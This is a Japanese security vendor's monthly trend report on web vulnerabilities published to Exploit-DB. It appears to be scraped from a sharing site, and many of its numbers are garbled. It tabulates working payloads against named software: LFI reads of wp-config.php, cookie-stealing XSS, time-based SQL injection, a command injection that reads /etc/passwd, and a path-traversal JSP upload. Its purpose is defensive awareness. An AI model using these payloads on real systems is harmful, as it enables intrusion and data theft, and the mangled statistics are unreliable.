最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

Size: px

Start display at page:

Download "最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4"

くにひとこいまる
6 years ago
Views:

1 06.04

2 最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果クロスサイトスクリプティング (Cross Site Scripting) の攻撃に対する報告数が最も多かったです分析されたクロスサイトスクリプティング (Cross Site Scripting) の攻撃は単にスクリプトをパラメーターに挿入する形式で Web 開発をする時パラメーターに対するセキュアコーディングを適用していたなら簡単に防ぐことができる攻撃パターンでした該当が発見されたソフトウェアを使用する管理者は最新バージョンのアップデートおよびセキュアコーディングを行いにさらされないように備えなければなりません今月は報告数が最近になって最も少ない期間でしたしかし攻撃危険度の側では先月と比べて相変わらず危険な様子を見せてくれています特に SQL インジェクション (SQL Injection) 攻撃と関連し特定の関数を使用する攻撃が成功すればデータベースの情報を簡単に類推できるので第次第次攻撃がすぐ発生しやすい危険なが発見されました該当が発見されたソフトウェアを使用する管理者はパラメーター入力値の検証をさらに厳しく実施して追加的に発生する可能性がある SQL インジェクション (SQL Injection) 攻撃に対して備えなければなりません. 別件数カテゴリファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) RFIリモートファイル挿入 (Remote File Inclusion:RFI) コマンドインジェクション (Command Injection) SQL インジェクション (SQL Injection) 件数クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 5 別件数危険度別件数危険度件数割合早急対応要 % 高 0 87% 合計 00% 危険度別分類早急対応要高 0. 攻撃実行の難易度別件数難易度件数割合難 9% 中 % 易 8 78% 合計 00% 攻撃実行の難易度別件数 8 難中易 4. 主なソフトウェア別発生件数ソフトウェア名 Desk op5 modified ecommerce Shopsoftware PHPBack RockMongo SocialEngine GLPi ManageEngine Password Manager Ovidentia OpenCart 合計件数主なソフトウェア別発生件数 Desk op5 modified ecommerce Shopsoftware Copyright 06 Penta Security s Inc. All rights reserved

3 最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するかあるいはクライアントに次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン対象のシステムの重要な情報を取得するため高度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号カテゴリ攻撃難易度危険度名ソフトウェア名 Copyright 06 Penta Security s Inc. All rights reserved

4 最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 LFI 易高 WordPress Advanced Video Plugin.0 - admin-ajax.php LFI /wp-admin/adminajax.php?action=ave_publishpost&title=&short=rnd&ter m=rnd&thumb=../wp-config.php WordPress Advanced Video Plugin XSS 易高 ManageEngine Password Manager Pro 80 to 80 - AddMail.ve XSS POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 service=&serviceurl=&loginname=&password=<! ><script>alert%8'xss'%9;<%fscript><! >&spassword=&tags=&rule=low&forwardurl=maila ccount.cc%f ManageEngine Password Manager ManageEngine Password Manager Pro 80 to SQL Injection 中高 SocialEngine SQL Injection /blogs/?category=0&end_date=&orderby=%0and% 0%8SELECT%0*%0FROM%0%8SELECT%8SLEE P%8IF%8MID%8version%8%9,,%9%0LIKE %05,99,0%9%9%9%9MTeU%9 SocialEngine SocialEngine LFI 易高 / LFI /../../../../../WEB-INF/web.xml RFI 易高 login_post.jsp RFI /login_post.jsp?url= XSS 易高 create_post.jsp XSS POST /webadmin/fileformats/create_post.jsp HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ filenameextension="><script>alert(document.cookie)</scri pt> Command Injection 中早急対応要 op command_test.php Command Injection /monitor/op5/nacoma/command_test.php?cmd_str=/bin/ cat%0/etc/passwd%0 %0nc% % op5 op POST /LiveTime/WebObjects/LiveTime.woa/wo/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -Type: multipart/form-data; boundary= dd009908f File Upload 易高 Desk 7..0, dd009908f and Disposition: form-data; /LiveTime/WebObjects/LiveTime. name=" "; woa/wo/ File Upload filename="../../srv/tomcat6/webapps/livetime/bla5.jsp" -Type: application/octet-stream Desk Desk 7..0, 7.0. and 6.5 <HTML> <HEAD> <TITLE>Hello World</TITLE> </HEAD> <BODY> <H>Hello World</H> Today is: <%= new java.util.date().tostring() %> </BODY> </HTML> dd009908f-- Copyright 06 Penta Security s Inc. All rights reserved

5 最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 XSS 易高 POST /rockmongo/index.php?action=login.index HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 RockMongo PHP MongoDB Administrator..8 - index.php Chrome/ Safari/55.7 XSS RockMongo RockMongo PHP MongoDB Administrator Command Injection 易高 OpenCart..0. to index.php Command Injection username="><script>alert()</script> /shop_directory/index.php?route=account/edit&b=system &c=ls OpenCart OpenCart..0. to XSS 易高 POST /LiveTime/WebObjects/LiveTime.woa/wo/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Desk 7..0, 7.0. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows and NT 6.; WOW64; Trident/6.0) /LiveTime/WebObjects/LiveTime. -Type: multipart/form-data; boundary= woa/wo/ XSS dd009908f Desk Desk 7..0, 7.0. and dd009908f -Disposition: form-data; name="tf_orgunitname" "><script>alert()</script> dd009908f RFI 易高 Ovidentia troubleticketsmodule statistique_evolution.php RFI /troubletickets-7-6/programs/statistique_evolution.php?globals[babinstal lpath]= Ovidentia Ovidentia troubleticketsmo dule XSS 易高 index.php XSS /phpmongodb/index.php/%%e%ciframe%0src=h ttp:// XSS 易高 POST /wp-admin/admin.php?page=kentopvc_settings HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 WordPress Kento Post View Chrome/ Safari/55.7 Counter Plugin.8 - admin.php XSS WordPress Kento Post View Counter Plugin. kento_pvc_today_text="<script>alert();</script><img src="b XSS 易高 WordPress leenk.me Plugin admin.php XSS POST /wp/wpadmin/admin.php?page=leenkme_facebook HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 WordPress leenk.me Plugin.5.0 facebook_description=%c%ftextarea%e%cscript %Eprompt%8%9%B%C%Fscript%E SQL Injection 易高 modified ecommerce Shopsoftware rev easybillcsv.php SQL Injection /shop/api/easybill/easybillcsv.php?token=module_easybil L_CSV_CRON_TOKEN&orders_status=-'))orsleep(5)/*&customers_status=*/% modified ecommerce Shopsoftware modified ecommerce Shopsoftware rev SQL Injection 難早急対応要 POST /phpback-..0/admin/ideas HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 PHPBack..0 - /phpback-..0/admin/ideas SQL Injection PHPBack PHPBack..0 search=&orderby=title,extractvalue(0x0a,concat(0x0a,(se lect USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION()))) Copyright 06 Penta Security s Inc. All rights reserved

6 最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 XSS 易高 phpliteadmin.php XSS POST /phpliteadmin/phpliteadmin.php?action=table_create&co nfirm= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ tablename=testtable&rows=&0_field=id&0_type=integ ER&0_defaultoption=defined"><script>alert()</script>&0 _defaultvalue=&_field=name&_type=integer&_def aultoption=defined&_defaultvalue=test XSS 易高 - /admin/signups// XSS POST /admin/signups//background?screen=signupheader HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 signup[note]=<script>alert(onfirm(document.cookie)</scri pt> XSS 易高 - /admin/sites//tags XSS POST /admin/sites//tags HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 page_tag[name]=<script>confirm(document.cookie)</scri pt> XSS 易高 - /admin/sites//pages/ XSS POST /admin/sites//pages/?screen=seo HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 page[headline]=volunteer<script>confirm(document.cook ie)</script> SQL Injection 中高..9 - field.php SQL Injection POST /modules/profile/admin/field.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ quicksearch_mod_profile_field=aaaa') AND (SELECT * FROM (SELECT(SLEEP()))IRLV) AND ('DhUh' LIKE 'DhUh&button_quicksearch_mod_profile_Field=Search&fil tersel=default&limitsel= SQL Injection 難 /ajax/getdropdownconnect.php?fromtype=computer&ite mtype=computer&page=&page_limit=%0procedure %0analyse%8%8select%0extractvalue%8rand%8%9 早急対応要 getdropdownconnect.php SQL Inj,concat%80xa,%8IF%8MID%8version%8%9,,%9 GLPi GLPi %0LIKE%05,%0BENCHMARK% ,SHA%8% 9%9,%9%9%9%9%9,%9 Copyright 06 Penta Security s Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 06.0 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです

最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4